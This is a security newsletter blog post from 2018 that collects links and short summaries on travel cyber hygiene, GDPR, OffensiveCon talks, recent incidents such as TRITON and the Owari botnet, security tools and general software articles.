Security Stack Sheet #4

Word of the week “Cyber security own goal”

Avoid scoring a cyber security own goal this summer

Cyber security is now an important part of our lives so, if you are travelling to the FIFA™ World Cup in Russia this summer, it’s understandable that you may be thinking about how best to secure your devices and key accounts.

This blog provides some quick and easy steps to improve your personal cyber security. It should be read alongside the FCO Travel Advice and the guidance offered on the Be on the Ball: World Cup 2018 website


“Data Re-Identification” – thanks to Dougy

Person re-identification (re-ID) –

has become increasingly popular in the community due to its application and research significance. It aims at spotting a person of interest in other cameras. In the early days, hand-crafted algorithms and small-scale evaluation were predominantly reported. Recent years have witnessed the emergence of large-scale datasets and deep learning systems which make use of large data volumes.

Link HERE and HERE  and HERE  and papers HERE and HERE and the reverse pseudonymisation HERE


Word of the week special

“Security 3 lines of defence”

The IIA and the IoD endorse the ‘Three Lines of Defence’ model as a way of explaining the relationship between these functions and as a guide to how responsibilities should be divided:

  • the first line of defence – functions that own and manage risk
  • the second line of defence – functions that oversee or specialise in risk management, compliance
  • the third line of defence – functions that provide independent assurance, above all internal audit

Links HERE and HERE and HERE


“Value Stream Mapping” and “Wardley (Value Chain) Mapping”

Links HERE and others HERE and HERE and HERE




Crypto Infographics



Crypto challenge of the week

-“Route” Transposition Cipher – thanks to Mark




May 25: GDPR Live! Waiting for first incident (and fine)!

June 12 2018: Trump met Kim


June 30: TLS1.1 mandatory for PCI-DSS compliance


Now: TLS1.2 mandatory for proper security

Jun 14: World Cup 2018

July and August – Holidays!!

March 29 2019: Brexit

Sept 2019: PSD2 security mandatory


Comic of the week

##Some OWASP stuff first

-OWASP Hackademic Challenges Project




-A developer’s guide to the GDPR – from IBM

Understand how the GDPR impacts you

This article, the first in a three-part series, summarizes the GDPR and explains how the privacy regulation impacts and applies to developing and supporting applications that are intended to be used by European Union citizens. Part 2 explores how to integrate privacy risk evaluation and mitigation within the software development lifecycle, and Part 3 provides practical application development techniques that can alleviate an application’s privacy risk

Links HERE Others HERE and HERE and HERE and HERE and HERE and HERE and HERE

-Utility script to build a PDF book gathering all OWASP Cheat Sheets

Link HERE Cheat sheets HERE

-Presentations from OffensiveCON

OffensiveCon18 – Markus Vervier and Michele Orru – Oh No, Where’s FIDO?

OffensiveCon18 – Brian Gorenc, Abdul-Aziz Hariri and Jasiel Spelman – L’art de l’évasion – Modern VMWare Exploitation Techniques

OffensiveCon18 – Alex Ionescu – Advancing the State of UEFI Bootkits

OffensiveCon18 – Cedric Halbronn – Robin Hood vs Cisco ASA AnyConnect

OffensiveCon18 – Niko Schmidt, Marco Bartoli, Fabian Yamaguchi – Field Report on a Zero-Day Machine

OffensiveCon18 – Ilya Smith – Linux ASLR and GNU Libc

OffensiveCon18 – Rodrigo Branco – Inside the Machine – Keynote Day 1

OffensiveCon18 – Maddie Stone – The Smarts Behind Hacking Dumb Devices

OffensiveCon18 – James Forshaw – New and Improved UMCI, Same Old Bugs

OffensiveCon18 – Alex Matrosov – Betraying the BIOS: Going Deeper into BIOS Guard Implementations

OffensiveCon18 – Nick Sampanis- Windows 10 RS2/RS3 GDI Data-Only Exploitation Tales

OffensiveCon18 – Joe Bialek – The Evolution of CFI Attacks and Defenses

OffensiveCon18 – Jos Wetzels and Ali Abbasi – Dissecting QNX – Analyzing & Breaking QNX Exploit Mitigations and Secure Random Number Generators

OffensiveCon18 – Jörn Schneeweisz – Surprise Rant

OffensiveCon18 – Vitaly Nikolenko – Concolic Testing for Kernel Fuzzing and Vulnerability Discovery


-Insights from Code Conference 2018

A collection of quotes, one-liners (and apologies) that were interesting, insightful, thought-provoking from #CODECON


-Don’t forget about



Incidents in the world last week

Other source HERE Find your country

Fraudsters exploiting newsworthy events

Opportunistic fraudsters have been using current events and exploiting public concern for their own financial gain

Owari botnet own-goal takeover

Security researchers recently took over the large Owari botnet after its owner failed to change the command-and-control (C&C) server’s weak default credentials



Global ALERT level

Incidents detail

MIT researchers develop frequency-hopping transmitter that fends off attackers

Academic researchers say they have invented a transmitter that can secure billions of Internet of Things products by individually scattering each bit of data that a device wirelessly sends out onto different radio frequency channels, thus preventing attackers from intercepting a full packet and manipulating its data


FireEye Finds New Clues in TRITON/TRISIS Attack

Researchers from FireEye have found proof that the hackers who breached and inadvertently shut down a safety monitoring system in a Middle East industrial plant reverse-engineered the protocol software.

“Instead of just being a theory that they reverse-engineered something or used legitimate resources to augment their development on it, now we have evidence that supports that,” says Steve Miller, a researcher with FireEye who made the discovery after studying the malware’s Python scripts.

The so-called TRITON/TRISIS attack targeted Schneider Electric’s emergency shutdown system – Triconex Tricon – with custom malware. Two of the plant’s safety-instrumented systems (SIS) controllers entered a failed safe mode that shut down the industrial process and ultimately led to last year’s discovery of the malware


Apple strikes blow to Facebook as it clamps down on data harvesting

Rules appear to target services like Onavo Protect, which claims to protect user data even as it feeds information to Facebook


Pwn goal: Hackers used the username root, password root for botnet control database login


Sofacy APT Has Subtly Changed Tactics

A well-known Russian cyber-espionage group has subtly changed its modus operandi, moving to what security researchers from Palo Alto Networks are calling “parallel attacks.”


A new vulnerability has been discovered in all Mac OS versions since 2005 that could have allowed for “code signing,” allowing an attacker to impersonate Apple on a machine

Prowli Malware Operation Infected Over 40,000 Servers, Mo-dems, and IoT Devices


Europol forms new Dark Web Team to combat online criminal marketplaces


The InvisiMole malware allows attackers to take control of a machine and silently allow them to here and see through the computer

Dixons Carphone admits huge data breach 5.9 million cards

Links HERE and HERE

Facebook bug changed 14 million users’ default privacy settings to public


Research shows 75% of ‘open’ Redis servers infected


Server-Side Spreadsheet Injection – Formula Injection to Remote Code Execution



Research of the week

-The Seven Properties of Highly Secure Devices


-Cryto papers

This webpage is an attempt to assemble a ranking of top-cited papers from the area of cryptography. The ranking has been created based on citations of papers published at top cryptography conferences. More details are available here



Tool of the week

-Finding deserialisation issues has never been easier: Freddy the serial(isation) killer


-Traefik and Docker Services

I run all my docker services ‘behind’ traefik ( I do not want to have my (hundreds of) docker services directly accessible from the Internet (security). I do not want to create and handle SSL/TLS certificates for all the docker services. Therefore I am using an SSL wildcard certificate and point it to my traefik ip address. Traefik terminates TLS/SSL and happily routes all my HTTP or HTTPS packages, based on HOST or URL pattern rules, to the designated back-end service. Furthermore, traefik is docker-aware and allows registering or unregistering docker services without restarting traefik


-Automated twitter loot collection

Twitter is a great place to find interesting things, being shared by fellow security researchers. If you search for keywords like #opendir or hxxp://, you’ll get lots of links with open directories containing shells, control panels, sources, phishing sites or malware. Secops is hard, even for people with malicious intents



Kewl articles

The AWS Well Architected Framework in a Nutshell

What is the Framework?



Your API Gateway should be a message queue

Or why we need Digital Osmosis


Conventional API Gateways handle difficult things like routing and provide a uniform layer that allows outside applicatons access without them having to understand what is going on in the inside.

Conventional API Gateways operate on the request/response pattern that most of the internet is based on. But this creates the problem of having to provide a relatively quick response so that the browser doesn’t time out. This becomes unnatural if the internals of the architecture use an event based architecture to allow for cleaner decoupling or otherwise trigger longer running tasks



The messy, musical process behind the web’s new security standard TLS1.3



The elite Microsoft hacker team that keeps windows PCs safe

ONE OF THEM jailbroke Nintendo handhelds in a former life. Another has more than one zero-day exploit to his name. A third signed on just prior to the devastating Shadow Brokers leak. These are a few of the members of the Windows red team, a group of hackers inside Microsoft who spend their days finding holes in the world’s most popular operating system. Without them, you’d be toast

Link HERE and purple team experiences HERE


Don’t Even Think of Complying with the New NIST Cybersecurity Framework!



Trust Issues Magazine

From personal relationships to the global stage, trust is what makes humanity more than just humans—and we’re in danger of losing it

Link HERE and the lifespan of a lie HERE


And finally, Goodbye, Object Oriented Programming

I’ve been programming in Object Oriented languages for decades. The first OO language I used was C++ and then Smalltalk and finally .NET and Java.

I was gung-ho to leverage the benefits of Inheritance, Encapsulation, and Polymorphism. The Three Pillars of the Paradigm.

I was eager to gain the promise of Reuse and leverage the wisdom gained by those who came before me in this new and exciting landscape.

I couldn’t contain my excitement at the thought of mapping my real-world objects into their Classes and expected the whole world to fall neatly into place.

I couldn’t have been more wrong




AppSec Ezine

Link HERE and credits to HERE

Leave a Reply

Your email address will not be published.